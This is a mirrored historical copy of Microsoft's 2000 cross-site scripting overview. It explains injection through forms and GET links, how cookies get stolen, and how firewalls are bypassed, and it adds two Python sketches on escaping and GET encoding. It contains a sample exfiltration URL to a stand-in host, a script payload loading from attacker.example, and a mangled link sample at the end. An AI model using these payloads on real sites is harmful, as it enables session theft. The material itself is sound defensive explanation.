Cross-site Scripting Overview
This is a historical document that describes the origins of Cross-site Scripting as a commonly accepted term. It is mirrored here only as a historical reference, in the hope that it will remain available well into the future. Supplemental information on CERT and on Apache.
Cross-site Scripting Overview

Originally Posted: February 2, 2000

David Ross - Microsoft
Ivan Brugiolo - Microsoft
John Coates - Microsoft
Microsoft - Microsoft
Michael Roe - Microsoft Research

Abstract

A security issue has come to Microsoft's attention that we refer to as cross-site scripting. This is not an entirely new issue; elements of the information we present have been known for some time within the software development community. However, the overall scope of the issue is larger than previously understood, both in terms of the breadth of the problem and the risk that it presents. It is important to explore the issue more comprehensively due to the current growth and complexity of the Web.

1. The Problem

Web pages contain both text and HTML markup that is generated by the server and interpreted by the client. Servers that generate static pages have full control over how the client will interpret the pages the server sends. However, servers that generate dynamic pages do not have control over how their output is interpreted by the client. The heart of the cross-site scripting security issue is that if untrusted content can be introduced into a dynamic page, neither the server nor the client has enough information at hand to recognize that this has happened and take protective action.

In HTML, to distinguish text from markup, some characters are treated specially. The grammar of HTML determines the significance of special characters: different characters are special at different points in the document. For example, the less-than sign (<) typically indicates the beginning of an HTML tag. Tags can either affect the formatting of the page or introduce a program that the browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program). The fact that HTML can contain programs written in scripting languages such as JavaScript is another critical component of the cross-site scripting issue.

Many Web servers generate Web pages dynamically.
For example, a search engine may perform a database search and then construct a Web page that contains the result of the search. Any server that creates Web pages by inserting dynamic data into a template should check that the data to be inserted does not contain any special characters (e.g. <). If the inserted data contains special characters, the user's Web browser will mistake them for HTML markup. As HTML markup can introduce programs, some data values, given the correct syntax, could be run as programs by the browser rather than being displayed as text. A large number of servers that dynamically generate Web pages don't check for special characters, or don't do it correctly (e.g. they check only some special characters and neglect others).

The risk of a Web server not checking for special characters in dynamically generated Web pages is this: if an attacker can choose the data that the Web server inserts into the generated page, then the attacker can trick the user's browser into running a program of the attacker's choice. This program will execute in the browser's security context for communicating with the victim Web server, not the browser's security context for communicating with the attacker. Thus, the program will execute in an inappropriate security context with inappropriate privileges. A variation involving HTML forms gives the attacker an easy way to perform this attack.

1.1 The attack without forms

Internet-based e-mail services and Web bulletin board systems have understood specific instances of this problem for quite some time. If a Web server takes data provided by one person and uses it to construct a Web page served to another, then the attack is obvious: the attacker writes the script they want the victim to run, then tells the Web server to send it to the victim.

This simple version of the attack could potentially affect any Web-based chat room. The chat-room server provides a client-to-client messaging service.
User X can send user Y a program that, when executed, sends a message to user Z. The upshot of this attack is that X can potentially trick Y into sending a message to Z, even if Y would never have intentionally sent that message to Z.

The effect of this exploit within the context of client-to-client communications facilitated by a server is widely recognized. Responsible Web site administrators understand the need to prevent this scenario. However, variants of the problem exist in other contexts as well, and these are much less well understood.

1.2 The attack using forms

The security problem with HTML forms is that when a Web server receives a completed form from a user agent, it can't tell where the form came from. The URL to which the completed form should be posted is part of the form. Two forms can both specify the same posting URL. They do not have to be on the same Web site; a form on an attacker's Web site can indicate to the browser that the completed form should be posted to a completely different Web site.

Completed forms do not distinguish between data supplied by the user and data supplied by the source of the form before the user filled it in. An attacker can create a modified version of a Web site's form, one in which certain fields that normally would be filled in by the user are instead fixed in advance by the attacker.

The attack proceeds as follows: The attacker first identifies a Web site that will accept a filled-in form and reply with a Web page containing data taken from the form, without checking for special characters. The attacker then creates their own form, on their own Web site, with the form's posting URL set to the victim Web server. One of the fields is specified so that the victim Web server's reply contains a program that will be executed by the browser. The attacker then entices a user into submitting the form.
The attacker can make submitting the form indistinguishable from following a normal link, so all that is needed is for the attacker to entice the user into following a link. Upon receiving the reply from the victim Web server, the user's browser will execute the program inside the reply.

Why is this an attack? Why is it any different from the attacker's Web site sending the user a Web page containing a program? The difference is in the apparent source of the program. The actions a program is allowed to perform depend on where it came from. The user can define some Web sites as trusted (i.e. programs from them are allowed to perform potentially unsafe operations, in the belief that they will not do so maliciously), while others are not trusted (i.e. programs from them should not be allowed to perform these operations). This attack enables an untrusted Web site to convince the browser that a program has come from a trusted Web site.

When the user interacts with several Web sites, these interactions should be isolated from each other. Web site X should not be able to monitor or interfere with a user's interactions with Web site Y, even if the user is talking to both sites at the same time. This attack breaks through this security barrier. Server X may interfere with the user's communication with server Y, as server X gains control over a script the user runs to communicate with Y.

1.3 Consequences of the attack

Assuming that a particular Web server is vulnerable to cross-site scripting attacks, the attacker can run a script in the wrong security context. This means that cookies can be read; locked-down plug-ins or native code can be instantiated and scripted with untrusted data; and user input may be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. HTTPS is not immune.

Data gathered by the malicious script can be sent back to the attacker's Web site.
For example, if the script has used the DHTML object model to extract data from a page, then it can send that data to the attacker by fetching a URL of the following form:

www.[evil].com/Collect.asp?data=1234567890123456

As long as the user navigates within a given domain, a robust exploit script can follow the user.

This attack can be used against machines behind firewalls. Many corporate local area networks are configured so that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked it to execute a program. To do this, all the attacker needs is a Web server inside the firewall that doesn't check fields in forms for special characters.

Only one page on one Web server in a domain is required to compromise the entire domain. This is true even if the vulnerable Web server doesn't hold any important data: it can still be used as part of an attack on other machines within the same domain. All Web servers should guard against this attack, even ones that don't perform critical tasks.

The need to validate all inputs rather than blindly using them is familiar to the software development community, including seasoned Web developers. However, this guidance is infrequently followed by the Web developer community at large, as evidenced by the large number of Web sites that are vulnerable to this attack. We believe this situation results in part from the fact that the full scope of the damage such an attack can cause has not been well understood. Our intent is to highlight proper Web site coding practices that, when implemented correctly, serve to block this vulnerability. Please refer to Appendix A for some detailed code samples of how an attack might appear in dynamically generated HTML output, and for some suggestions on preventing untrusted input from being written to output.
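Separately from the samples in Appendix A, the check for special characters discussed throughout this section can be illustrated with a minimal sketch. It is not the authors' code: it uses Python's standard-library html.escape, and the template, the function names, and the attacker.example host are all hypothetical. It also assumes the data is inserted as plain text between tags; as noted earlier, different characters are special at different points in an HTML document, so other contexts may need different handling.

```python
import html

# Hypothetical page template with one slot for dynamic data.
TEMPLATE = "<p>You searched for: {query}</p>"


def render_unsafe(query: str) -> str:
    """Insert the data as-is; special characters reach the browser as markup."""
    return TEMPLATE.format(query=query)


def render_escaped(query: str) -> str:
    """Replace &, <, >, and quote characters with entities before inserting."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


# Attacker-chosen value (hypothetical host) supplied where a search term is expected.
attack = '<script src="http://attacker.example/x.js"></script>'

if __name__ == "__main__":
    print(render_unsafe(attack))   # contains a live <script> tag
    print(render_escaped(attack))  # the same value, displayed as inert text
```

With the escaped version, the browser displays the attacker's value as text instead of interpreting it as a tag, which is the behavior the server intended for a search term.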
1.4 The attack with HTTP GET

The Web provides two different mechanisms for submitting forms, GET and POST. In the GET method, the content of the form is used to construct a URL, which the browser then retrieves. The Web server interprets a request for that URL as a submission of the form.

This attack works using both the GET and POST methods. However, it is especially easy with the GET method, as the user does not need to be aware that they are submitting a form. The attacker just needs to entice the user into following a link. As far as the user is concerned, they are just retrieving a Web page. But the victim Web server will think that the user is submitting a form, because they have asked for a special URL.

It is not necessary to create a Web site in order to carry out the GET version of this attack. The URL can be sent in a mail message or posted to a USENET newsgroup. Examine the following HTML link:

<a class=www.[foo].com/form.asp? id=<script src="/img/spacer.gif">
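The way a GET submission collapses into a single URL can be sketched as follows. This is only an illustration under stated assumptions: the host victim.example, the field name id, the payload, and both helper functions are hypothetical, and the standard-library urllib.parse module stands in for what a browser and a server would each do.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def build_get_url(action: str, fields: dict) -> str:
    """Build the URL a browser would request when submitting `fields` via GET."""
    return f"{action}?{urlencode(fields)}"


def server_side_fields(url: str) -> dict:
    """Decode the query string the way a form-handling server would."""
    return parse_qs(urlsplit(url).query)


# Hypothetical attacker-chosen field value and victim form handler.
payload = "<script>alert(1)</script>"
link = build_get_url("http://victim.example/form.asp", {"id": payload})

if __name__ == "__main__":
    print(link)                      # an ordinary-looking link, payload percent-encoded
    print(server_side_fields(link))  # the server recovers the original field value
```

The server cannot tell whether such a URL came from its own form or from a link written by someone else, so following the link is equivalent to submitting the form with the attacker's data.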